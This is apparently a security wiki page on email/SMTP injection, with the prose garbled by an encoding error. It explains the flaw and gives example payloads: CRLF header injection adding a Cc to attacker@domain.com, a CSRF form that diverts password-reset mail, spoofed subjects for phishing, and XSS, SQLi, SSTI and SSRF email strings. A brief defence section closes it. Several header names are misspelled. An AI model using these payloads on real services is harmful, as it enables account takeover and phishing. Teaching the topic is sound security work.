Email Injection

SMTP Injection & Mail Injection

๐Ÿ” Introduction

Email Injection์€ Application์—์„œ ์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ ๋ฐ›์€ ์ž…๋ ฅ ๊ฐ’์ด Email์„ ์ฒ˜๋ฆฌํ•˜๋Š”๋ฐ ์‚ฌ์šฉ๋˜๊ณ  ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์˜์ ์ธ ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ๋ฉ”์ผ ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

{
    "email":"sender@domain.com%0ACc:attacker@domain.com"
}

๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•œ๋‹ค๋ฉด ๊ณต์‹ ๊ณ„์ • ์‚ฌ์นญ์ด๋‚˜ ํ”ผ์‹ฑ ๋“ฑ์— ํ™œ์šฉ๋  ์ˆ˜ ์žˆ๊ณ , ์—ฐ๊ด€๋œ ์‹œ์Šคํ…œ์— ๋”ฐ๋ผ์„œ ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์— ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์ดˆ๋Œ€, ์•ˆ๋‚ด ๋“ฑ ์›น ์š”์ฒญ ์ดํ›„์— ์ด๋ฉ”์ผ์ด ์ „์†ก๋˜๋Š” ๋ชจ๋“  ๊ตฌ๊ฐ„์€ Email Injection์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com

email ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ†ตํ•ด ๋ฐ›์€ ๊ฐ’์ด SMTP ๋“ฑ ๋ฉ”์ผ ์ „์†ก ์‹œ์Šคํ…œ์„ ํ†ตํ•ด ์ „์†ก๋  ๋•Œ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์—†๋‹ค๋ฉด CRLF(๊ฐœํ–‰๋ฌธ์ž)๋“ฑ์„ ์ด์šฉํ•˜์—ฌ Email์˜ ์†ก/์ˆ˜์‹ ์ธ, ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject

Exploitation

Common Vuln

Type Payload
XSS test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com
SSTI "<%= 7 * 7 %>"@example.comtest+(${{7*7}})@example.com
SQLi "' OR 1=1 -- '"@example.com"mail'); DROP TABLE users;--"@example.com
SSRF (Era of ssrf) john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1]
Parameter pollution victim&email=[attacker@example.com](mailto:attacker@example.com)
Email header injection "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
Wildcard abuse %@example.com

Refer: E-mail ํฌ๋งท์„ ์ด์šฉํ•œ ์—ฌ๋Ÿฌ๊ฐ€์ง€ Exploiting ๊ธฐ๋ฒ•๋“ค

Stealing sensitive inforamation

CSRF ๋“ฑ์˜ ์ทจ์•ฝ์ ๊ณผ ์กฐํ•ฉ๋˜๋ฉด ํŒจ์Šค์›Œ๋“œ ์žฌ ์„ค์ • ์‹œ ๋ฐœ์ƒํ•˜๋Š” ๋ฉ”์ผ์ด๋‚˜ 2FA ์ธ์ฆ ๊ฐ’ ๋“ฑ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com

๋ฉ”์ผ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ์š”์ฒญ ์‹œ Email Injectionํ•˜์—ฌ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ์—๋„ Cc๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ๋„๋ก ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ๊ตฌ์„ฑํ•œ๋‹ค๋ฉด ํ”ผํ•ด์ž๊ฐ€ CSRF ์ฝ”๋“œ ์ ‘๊ทผ ์‹œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์žฌ์ƒ์„ฑ ๋งํฌ ๋“ฑ์„ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ๋กœ๋„ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์–ด ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์˜ ์ด์Šˆ์™€ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<form arciton="https://weakness-service/findPassword" method="post">
    <input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>

Header/Content Injection

Email Injection์ด ๊ฐ€๋Šฅํ•œ ๋ฉ”์ผ์ด noreply@blahblah ๋“ฑ ๊ณต์‹ ๊ณ„์ •์œผ๋กœ ์ „์†ก๋˜๋Š” ๊ฒฝ์šฐ mail์˜ ํ—ค๋”์— ๊ฐœํ–‰ ๋ฌธ์ž๋“ฑ์„ ์‚ฝ์ž…ํ•˜์—ฌ Subject, Body ๋“ฑ์„ ์กฐ์ž‘ํ•˜์—ฌ ๊ณต์‹ ๊ณ„์ •์—์„œ์˜ ํ”ผ์‹ฑ ๋ฉ”์ผ์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /notify HTTP/1.1

email=victim@domain.com%0ASubjact:Important%20Security%20Alerts%0A%0AFake%20Message!

๋˜ํ•œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์ด ๋ฉ”์ผ ๋ณธ๋ฌธ์— ์‚ฝ์ž…๋˜๋Š” ๊ฒฝ์šฐ HTML ํƒœ๊ทธ, CSS ๋“ฑ์„ ์ด์šฉํ•˜์—ฌ ์„œ๋น„์Šค์—์„œ ์˜๋„ํ•˜์ง€ ์•Š์„ ๋ฉ”์ผ์„ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /notify HTTP/1.1

email=victim@domain.com&name=alice<br>Please%20Click%20Me<!--

RCE

Mail ์ „์†ก์„ ์œ„ํ•ด์„œ Command-line์œผ๋กœ ๋‹ค๋ฅธ Mail Application์„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๋Œ€ํ‘œ์ ์œผ๋กœ PHP Cli์˜ mail() ํ•จ์ˆ˜๋„ ๋น„์Šทํ•˜์ฃ .

์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ Command Injection๊ณผ ๋™์ผํ•˜๊ฒŒ ํ•ด๋‹น ๊ณผ์ •์—์„œ ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•œ ์ฒ˜๋ฆฌ๊ฐ€ ๋ฏธํกํ•˜๋‹ค๋ฉด ์ด๋ฅผ ํ†ตํ•ด ์ตœ์ข…์ ์œผ๋กœ RCE๊นŒ์ง€ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tricks

  • Subjact: <TITLE>: ์ œ๋ชฉ
  • Cc: <attacker mail address>: CC(์ฐธ์กฐ) ์„ค์ •์œผ๋กœ ๋ฉ”์ผ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Œ
  • Replay-To: <attacker mail address>: Replay-to๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ํšŒ์‹  ๋Œ€์ƒ์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์–ด ๋ฉ”์ผ์„ ๋ฐ›์•„์˜ฌ ์ˆ˜ ์žˆ์Œ

๐Ÿ›ก Defensive techniques

์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ Email ์ „์†ก์— ์‚ฌ์šฉ๋˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›์•„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์ง€์ •๋œ ํฌ๋งท์˜ ๋ฐ์ดํ„ฐ ์ด์™ธ์—๋Š” ์ฒ˜๋ฆฌํ•˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ํŠนํžˆ ๊ฐœํ–‰๋ฌธ์ž์˜ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ๊ฐ€์ง€ Exploit ํฌ์ธํŠธ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ผญ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

๐Ÿ“Œ References

  • https://en.wikipedia.org/wiki/Email_injection
  • https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
  • https://www.hahwul.com/cullinan/crlf-injection/#-defensive-techniques